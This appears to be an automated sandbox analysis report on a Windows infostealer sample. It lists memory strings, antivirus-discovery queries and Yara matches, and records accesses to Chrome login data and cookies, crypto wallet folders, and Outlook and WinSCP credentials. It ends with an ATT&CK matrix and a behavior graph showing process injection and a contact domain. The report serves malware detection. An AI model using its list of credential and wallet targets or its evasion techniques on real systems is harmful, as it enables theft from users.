              Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: *Program ManagerpszDesktopTitleWSoftware\Classes\
              Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: animationTileContentsSrcVerticalScrollBaranimationProgressSrcanimationTileContentsDstInneranimationTileContentsSrcInneranimationTileContentsDstanimationProgressDstInneranimationProgressDstanimationProgressSrcInnereltRegularTileHeadereltSummaryeltInterruptPaneeltProgressBaridOperationTileeltInterruptDoForAlleltItemIconeltInterruptDescriptioneltInterruptButtonsContainereltInterruptDeleteBtneltInterruptElevateBtneltItemPropseltItemNameeltInterruptYesBtneltInterruptRetryBtneltInterruptCancelBtneltInterruptSkipBtnConfirmationCheckBoxDoForAlleltInterruptNoBtneltInterruptOKBtnshell\shell32\operationstatusmgr.cppidTileSubTextidOperationInterrupteltInterruptDoForAllLabelidTileActionIdTileKeepSourceidItemTileIdTileDecideForEachIdTileIgnoreIdTileKeepAsPersonalIdTileKeepAsWorkIdTileKeepDestCustomCommandIconDecideForEachTileIconSkipTileIconKeepSourceTileIconeltItemTileContainereltConflictInterruptDescriptionidTileIconidCustomConflictInterrupteltInterruptTileHeaderidConflictInterrupteltRateChartCHARTVIEW%0.2fIdTileDefaulteltPauseButtoneltTileContentseltTile%ueltTimeRemainingeltConflictInterrupteltConfirmationInterrupteltLocationseltItemsRemainingeltDetailseltScrolleltRegularTileeltCancelButtonidTileHosteltScrollBarFillereltDividereltProgressBarContainereltDisplayModeBtnFocusHoldereltDisplayModeBtnWindows.SystemToast.ExplorerEnthusiastModeprogmaneltFooterArealfEscapementSoftware\Microsoft\NotepadRICHEDIT50WlfUnderlinelfItaliclfWeightlfOrientationlfClipPrecisionlfOutPrecisionlfCharSetlfStrikeOutLucida ConsoleiPointSizelfPitchAndFamilylfQualitylfFaceName
              Source: fontview.exe, 00000013.00000003.406207334.0000000005084000.00000004.00000020.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.406327938.0000000005110000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndSHCore.Subclass.DataSystem\CurrentControlSet\Control\HvsiWindowOverrideScaleFactorSoftware\Microsoft\Windows\CurrentVersion\Explorer\FCM\Impolite[
              Source: fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ImageList_CoCreateInstanceProgmanProgram Managercomctl32.dllImageList_ReplaceIconImageList_CreateImageList_Destroy
              Source: fontview.exe, 00000013.00000003.412196998.0000000006930000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.410010255.00000000055B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |}TFoldersAppPropertiesShell*ProgmanProgmanPROGMANSoftware\Microsoft\Windows\CurrentVersion\PoliciesPolicyAutoColorizationHandleAssociationChange
              Source: explorer.exe, 00000001.00000000.267687149.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
              Source: explorer.exe, 00000001.00000000.267939232.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: fontview.exe, 00000013.00000003.400623587.00000000055B0000.00000004.00001000.00020000.00000000.sdmp, fontview.exe, 00000013.00000003.400263237.0000000005084000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
              Source: fontview.exe, 00000013.00000003.401675563.0000000005000000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: RtlDllShutdownInProgress_p0.*System*.*....../UseSystemForSystemFoldersSoftware\Microsoft\Windows\CurrentVersion\Explorerdesktop.ini%APPDATA%%USERPROFILE%%ALLUSERSPROFILE%%ProgramFiles%%SystemRoot%%SystemDrive%\\%COMPUTERNAME%...\...PATH.exe.lnk.cmd.bat.com.pifCutListSoftware\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation\VarFileInfo\Translation\StringFileInfo\%04X%04X\FileDescription\StringFileInfo\040904E4\FileDescription\StringFileInfo\04090000\FileDescriptionProgram ManagerpszDesktopTitleW%%%s%%%sUSERPROFILEProgramFilesSystemRootSystemDrivewindir"%1"commandshellSoftware\classesDefaultIconshell\%sAssignmentType0Software\Classes\Applications\%sSoftware\Classes\Applications%1.ade.adp.app.asp.cer.chm.cnt.crt.csh.der.fxp.gadget.grp.hlp.hpj.inf.ins.isp.its.js.jse.ksh.mad.maf.mag.mam.maq.mar.mas.mat.mau.mav.maw.mcf.mda.mdb.mde.mdt.mdw.mdz.msc.msh.msh1.msh1xml.msh2.msh2xml.mshxml.msp.mst.msu.ops.pcd.pl.plg.prf.prg.printerexport.ps1.ps1xml.ps2.ps2xml.psc1.psc2.psd1.psm1.pst.scf.sct.shb.shs.theme.tmp.url.vbe.vbp.vbs.vhd.vhdx.vsmacros.vsw.webpnp.ws.wsc.wsf.wsh.xnkHKCU:HKLM:HKCR:%s\shell\%s\commandshell\%s\commandSoftware\Clients\%sSoftware\Clients\%s\%sOpen*.*....../UseSystemForSystemFoldersdesktop.ini%SystemDrive%\\%COMPUTERNAME%...\...%s\%s\StringFileInfo\04090000\FileDescriptionT
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: EnumSystemLocalesW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetLocaleInfoW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetLocaleInfoW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetLocaleInfoW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: EnumSystemLocalesW,
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
              Source: C:\Windows\System32\rundll32.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\dllhost.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\Library.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Library.exe VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\Library.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00413A75 cpuid
              Source: C:\Windows\System32\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_00413CC0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
              Source: C:\Users\user\AppData\Local\Temp\336E.exeCode function: 14_2_004041D0 SHGetFolderPathA,GetModuleFileNameA,GetComputerNameA,GetUserNameA,
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ngentask.exe PID: 816, type: MEMORYSTR
              Source: Yara matchFile source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.635769063.000002275D541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.517892986.000002275DAB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.465106371.000002275D66D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.463672074.000002275D472000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.519715452.000002275DCB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumE#
              Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q1C:\Users\user\AppData\Roaming\Electrum\wallets\*
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: JaxxE#
              Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum\wallets
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ExodusE#
              Source: ngentask.exe, 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: EthereumE#
              Source: ngentask.exe, 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: q5C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\*
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Bookmarks
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Cookies
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
              Source: C:\Windows\System32\rundll32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Ethereum\wallets\
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
              Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
              Source: Yara matchFile source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.460489461.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ngentask.exe PID: 816, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: dump.pcap, type: PCAP
              Source: Yara matchFile source: 16.3.226F.exe.d030000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 18.2.ngentask.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.d030000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.d030000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.226F.exe.16f3fc0.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.2.226F.exe.16f3fc0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.16f3fc0.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 16.3.226F.exe.16f3fc0.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000010.00000003.367401202.000000000D030000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.469890360.00000000016EB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000002.479891077.00000000016F2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.460489461.000000000343F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000010.00000003.369928370.000000000D032000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000012.00000002.456297712.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: ngentask.exe PID: 816, type: MEMORYSTR
              Source: Yara matchFile source: 0000000D.00000002.403573170.0000000004921000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.291031913.0000000004931000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.402735340.0000000002C50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.290704860.0000000002C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.635769063.000002275D541000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.517892986.000002275DAB3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000003.383001700.0000000003666000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.465106371.000002275D66D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.463672074.000002275D472000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000003.519715452.000002275DCB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.467467655.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: fontview.exe PID: 4020, type: MEMORYSTR
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts431
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              1
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium3
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts11
              Native API
              1
              Scheduled Task/Job
              712
              Process Injection
              111
              Deobfuscate/Decode Files or Information
              21
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol3
              Data from Local System
              Exfiltration Over Bluetooth11
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)1
              Scheduled Task/Job
              31
              Obfuscated Files or Information
              1
              Credentials in Registry
              3
              File and Directory Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration1
              Non-Standard Port
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local Accounts1
              Command and Scripting Interpreter
              Logon Script (Mac)Logon Script (Mac)32
              Software Packing
              NTDS365
              System Information Discovery
              Distributed Component Object Model21
              Input Capture
              Scheduled Transfer4
              Non-Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud Accounts1
              Scheduled Task/Job
              Network Logon ScriptNetwork Logon Script1
              DLL Side-Loading
              LSA Secrets1
              Query Registry
              SSH2
              Clipboard Data
              Data Transfer Size Limits115
              Application Layer Protocol
              Manipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable Media1
              PowerShell
              Rc.commonRc.common1
              File Deletion
              Cached Domain Credentials981
              Security Software Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items11
              Masquerading
              DCSync12
              Process Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job581
              Virtualization/Sandbox Evasion
              Proc Filesystem581
              Virtualization/Sandbox Evasion
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)712
              Process Injection
              /etc/passwd and /etc/shadow1
              Application Window Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)1
              Hidden Files and Directories
              Network Sniffing1
              System Owner/User Discovery
              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Compromise Software Dependencies and Development ToolsWindows Command ShellCronCron1
              Rundll32
              Input Capture1
              Remote System Discovery
              Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 signatures2 2 Behavior Graph ID: 791295 Sample: aw9Ynwqd1x.exe Startdate: 25/01/2023 Architecture: WINDOWS Score: 100 94 Snort IDS alert for network traffic 2->94 96 Multi AV Scanner detection for domain / URL 2->96 98 Malicious sample detected (through community Yara rule) 2->98 100 15 other signatures 2->100 13 aw9Ynwqd1x.exe 2->13         started        16 dbjigst 2->16         started        18 svcupdater.exe 2->18         started        20 svcupdater.exe 2->20         started        process3 signatures4 134 Detected unpacking (changes PE section rights) 13->134 136 Maps a DLL or memory area into another process 13->136 138 Checks if the current machine is a virtual machine (disk enumeration) 13->138 22 explorer.exe 6 14 13->22 injected 140 Multi AV Scanner detection for dropped file 16->140 142 Machine Learning detection for dropped file 16->142 144 Creates a thread in another existing process (thread injection) 16->144 process5 dnsIp6 90 potunulit.org 188.114.97.3, 49728, 80 CLOUDFLARENETUS European Union 22->90 70 C:\Users\user\AppData\Roaming\dbjigst, PE32 22->70 dropped 72 C:\Users\user\AppData\Local\Temp\336E.exe, PE32 22->72 dropped 74 C:\Users\user\AppData\Local\Temp\2560.exe, PE32 22->74 dropped 76 2 other malicious files 22->76 dropped 120 System process connects to network (likely due to code injection or exploit) 22->120 122 Benign windows process drops PE files 22->122 124 Deletes itself after installation 22->124 126 Hides that the sample has been downloaded from the Internet (zone.identifier) 22->126 27 226F.exe 9 22->27         started        32 336E.exe 3 22->32         started        34 2560.exe 22->34         started        file7 signatures8 process9 dnsIp10 92 gekjegoudn6i5fbces.jomf6mtobkl32eai1qwqxsxpnfyv2s 